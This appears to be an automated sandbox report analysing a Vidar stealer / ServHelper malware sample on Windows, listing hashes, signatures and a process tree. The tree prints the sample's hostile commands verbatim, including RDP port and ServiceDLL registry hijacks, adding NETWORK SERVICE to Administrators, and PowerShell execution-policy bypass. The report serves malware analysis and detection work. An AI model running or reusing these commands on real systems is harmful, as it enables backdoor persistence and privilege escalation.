Analysis
-
max time kernel
136s -
max time network
146s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
16-10-2021 00:40
Static task
static1
General
-
Target
613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe
-
Size
727KB
-
MD5
2cbbe36a44658b6641048bfd57e1ea7f
-
SHA1
197d39e7067afe3119a15729d39e6c05df672f05
-
SHA256
613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa
-
SHA512
d61fd507d0d77339c165df0df11365558a408c08e50c1ceac594e93100bba40b4cf672b161cd2f731931b6f8636b4afee0c598f1b8f241f5a33dc8f68ab2b7d5
Malware Config
Extracted
vidar
41.4
1008
https://mas.to/@sslam
-
profile_id
1008
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/2324-117-0x0000000000400000-0x0000000001729000-memory.dmp family_vidar behavioral1/memory/2324-116-0x0000000003470000-0x0000000003546000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 4464 VUS3EJQ1FLLGUB0G.exe 1088 InstallUtil.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Loads dropped DLL 2 IoCs
pid Process 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/4464-130-0x0000000006C00000-0x0000000006C21000-memory.dmp agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4464 set thread context of 1088 4464 VUS3EJQ1FLLGUB0G.exe 72 -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 4632 2324 WerFault.exe 68 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5044 reg.exe -
NTFS ADS 4 IoCs
description ioc Process File opened for modification C:\ProgramData\VUS3EJQ1FLLGUB0G.exe:Zone.Identifier 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe File created C:\ProgramData\VUS3EJQ1FLLGUB0G.exeC:\ProgramData\HIWZI0MMADZ9BA8N.exe 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe File created C:\ProgramData\VUS3EJQ1FLLGUB0G.exe:Zone.IdentifierC:\ProgramData\VUS3EJQ1FLLGUB0G.exeC:\ProgramData\HIWZI0MMADZ9BA8N.exe:Zone.Identifier 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe File created C:\ProgramData\VUS3EJQ1FLLGUB0G.exe:Zone.Identifier 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 37 IoCs
pid Process 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe 4632 WerFault.exe 4632 WerFault.exe 4632 WerFault.exe 4632 WerFault.exe 4632 WerFault.exe 4632 WerFault.exe 4632 WerFault.exe 4632 WerFault.exe 4632 WerFault.exe 4632 WerFault.exe 4632 WerFault.exe 4632 WerFault.exe 4464 VUS3EJQ1FLLGUB0G.exe 4464 VUS3EJQ1FLLGUB0G.exe 2800 powershell.exe 2800 powershell.exe 2800 powershell.exe 5012 powershell.exe 5012 powershell.exe 5012 powershell.exe 3276 powershell.exe 3276 powershell.exe 3276 powershell.exe 3280 powershell.exe 3280 powershell.exe 3280 powershell.exe 2800 powershell.exe 2800 powershell.exe 2800 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 628 Process not Found -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeRestorePrivilege 4632 WerFault.exe Token: SeBackupPrivilege 4632 WerFault.exe Token: SeDebugPrivilege 4632 WerFault.exe Token: SeDebugPrivilege 4464 VUS3EJQ1FLLGUB0G.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 5012 powershell.exe Token: SeDebugPrivilege 3276 powershell.exe Token: SeDebugPrivilege 3280 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2324 wrote to memory of 4464 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe 69 PID 2324 wrote to memory of 4464 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe 69 PID 2324 wrote to memory of 4464 2324 613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe 69 PID 4464 wrote to memory of 1088 4464 VUS3EJQ1FLLGUB0G.exe 72 PID 4464 wrote to memory of 1088 4464 VUS3EJQ1FLLGUB0G.exe 72 PID 4464 wrote to memory of 1088 4464 VUS3EJQ1FLLGUB0G.exe 72 PID 4464 wrote to memory of 1088 4464 VUS3EJQ1FLLGUB0G.exe 72 PID 4464 wrote to memory of 1088 4464 VUS3EJQ1FLLGUB0G.exe 72 PID 4464 wrote to memory of 1088 4464 VUS3EJQ1FLLGUB0G.exe 72 PID 4464 wrote to memory of 1088 4464 VUS3EJQ1FLLGUB0G.exe 72 PID 4464 wrote to memory of 1088 4464 VUS3EJQ1FLLGUB0G.exe 72 PID 4464 wrote to memory of 1088 4464 VUS3EJQ1FLLGUB0G.exe 72 PID 1088 wrote to memory of 2800 1088 InstallUtil.exe 74 PID 1088 wrote to memory of 2800 1088 InstallUtil.exe 74 PID 1088 wrote to memory of 2800 1088 InstallUtil.exe 74 PID 2800 wrote to memory of 4248 2800 powershell.exe 76 PID 2800 wrote to memory of 4248 2800 powershell.exe 76 PID 2800 wrote to memory of 4248 2800 powershell.exe 76 PID 4248 wrote to memory of 4924 4248 csc.exe 77 PID 4248 wrote to memory of 4924 4248 csc.exe 77 PID 4248 wrote to memory of 4924 4248 csc.exe 77 PID 2800 wrote to memory of 5012 2800 powershell.exe 80 PID 2800 wrote to memory of 5012 2800 powershell.exe 80 PID 2800 wrote to memory of 5012 2800 powershell.exe 80 PID 2800 wrote to memory of 3276 2800 powershell.exe 82 PID 2800 wrote to memory of 3276 2800 powershell.exe 82 PID 2800 wrote to memory of 3276 2800 powershell.exe 82 PID 2800 wrote to memory of 3280 2800 powershell.exe 84 PID 2800 wrote to memory of 3280 2800 powershell.exe 84 PID 2800 wrote to memory of 3280 2800 powershell.exe 84 PID 2800 wrote to memory of 5112 2800 powershell.exe 86 PID 2800 wrote to memory of 5112 2800 powershell.exe 86 PID 2800 wrote to memory of 5112 2800 powershell.exe 86 PID 2800 wrote to memory of 5044 2800 powershell.exe 87 PID 2800 wrote to memory of 5044 2800 powershell.exe 87 PID 2800 wrote to memory of 5044 2800 powershell.exe 87 PID 2800 wrote to memory of 4048 2800 powershell.exe 88 PID 2800 wrote to memory of 4048 2800 powershell.exe 88 PID 2800 wrote to memory of 4048 2800 powershell.exe 88 PID 2800 wrote to memory of 1884 2800 powershell.exe 89 PID 2800 wrote to memory of 1884 2800 powershell.exe 89 PID 2800 wrote to memory of 1884 2800 powershell.exe 89 PID 1884 wrote to memory of 5052 1884 net.exe 90 PID 1884 wrote to memory of 5052 1884 net.exe 90 PID 1884 wrote to memory of 5052 1884 net.exe 90 PID 2800 wrote to memory of 368 2800 powershell.exe 91 PID 2800 wrote to memory of 368 2800 powershell.exe 91 PID 2800 wrote to memory of 368 2800 powershell.exe 91 PID 368 wrote to memory of 64 368 cmd.exe 92 PID 368 wrote to memory of 64 368 cmd.exe 92 PID 368 wrote to memory of 64 368 cmd.exe 92 PID 64 wrote to memory of 704 64 cmd.exe 93 PID 64 wrote to memory of 704 64 cmd.exe 93 PID 64 wrote to memory of 704 64 cmd.exe 93 PID 704 wrote to memory of 4936 704 net.exe 94 PID 704 wrote to memory of 4936 704 net.exe 94 PID 704 wrote to memory of 4936 704 net.exe 94 PID 2800 wrote to memory of 3448 2800 powershell.exe 95 PID 2800 wrote to memory of 3448 2800 powershell.exe 95 PID 2800 wrote to memory of 3448 2800 powershell.exe 95 PID 3448 wrote to memory of 1620 3448 cmd.exe 96 PID 3448 wrote to memory of 1620 3448 cmd.exe 96 PID 3448 wrote to memory of 1620 3448 cmd.exe 96 PID 1620 wrote to memory of 3380 1620 cmd.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe"C:\Users\Admin\AppData\Local\Temp\613df014511b022045728afac469eb460e95ee7773e1a9e6083cc6f5ca2fe6aa.exe"1⤵
- Loads dropped DLL
- Checks processor information in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\ProgramData\VUS3EJQ1FLLGUB0G.exe"C:\ProgramData\VUS3EJQ1FLLGUB0G.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'4⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4bzrxrfa\4bzrxrfa.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCDEB.tmp" "c:\Users\Admin\AppData\Local\Temp\4bzrxrfa\CSCA7D2E8B1D5149C982482F4C19A178C0.TMP"6⤵PID:4924
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3276
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵PID:5112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f5⤵
- Modifies registry key
PID:5044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f5⤵PID:4048
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵PID:5052
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr6⤵
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\SysWOW64\net.exenet start rdpdr7⤵
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr8⤵PID:4936
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService6⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\SysWOW64\net.exenet start TermService7⤵PID:3380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService8⤵PID:896
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵PID:1892
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19362⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4632
-